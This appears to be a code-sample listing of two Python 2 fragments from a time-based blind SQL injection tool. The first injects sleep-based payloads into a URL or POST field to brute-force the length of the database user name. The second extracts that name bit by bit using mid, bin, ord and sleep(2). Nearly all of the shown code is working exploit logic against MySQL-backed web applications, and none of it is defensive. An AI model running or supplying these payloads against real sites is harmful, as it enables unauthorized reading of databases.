Пример #1
0
def getlen(url,data=None,para=None):
    i=0
    if data==None:
        while True:
            print "[+] Checking: %s " %i
            payload = url+"'+or+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
            #print payload
            html=httpres(payload)
            flag="timeout"
            if flag in html:
                print u"长度为:%s"%i
                return i
            i+=1
    else:
        while True:
            print "[+] Checking: %s " %i
            a=format(data) 
            a[para]=a[para]+"'or sleep(if(length((select user()))="+str(i)+",1,0))#" 
            post_data = urllib.urlencode(a) 
            #print payload
            html=httpres(url,post_data)
            flag="timeout"
            if flag in html:
                print u"长度为:%s"%i
                return i
            i+=1
Пример #2
0
 def run(self):
     global res #用来存二进制
     url=self.url
     j=self.str
     x=self.x
     para=self.para
     data=self.data
     if data==None:
         payload = url+"'or+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
         html=httpres(payload)
         flag="timeout"
         if flag in html:
             res[str(j)] = 1
         else:
             res[str(j)] = 0   
     else: 
         a=format(data)
         a[para]=a[para]+"'or if(1=(mid(lpad(bin(ord(mid((select user())," + str(x) + ",1))),8,0),"+ str(j) + ",1)),sleep(2),0)#"
         post_data = urllib.urlencode(a)
         html=httpres(url,post_data)
         flag="timeout"
         if flag in html:
             res[str(j)] = 1
         else:
             res[str(j)] = 0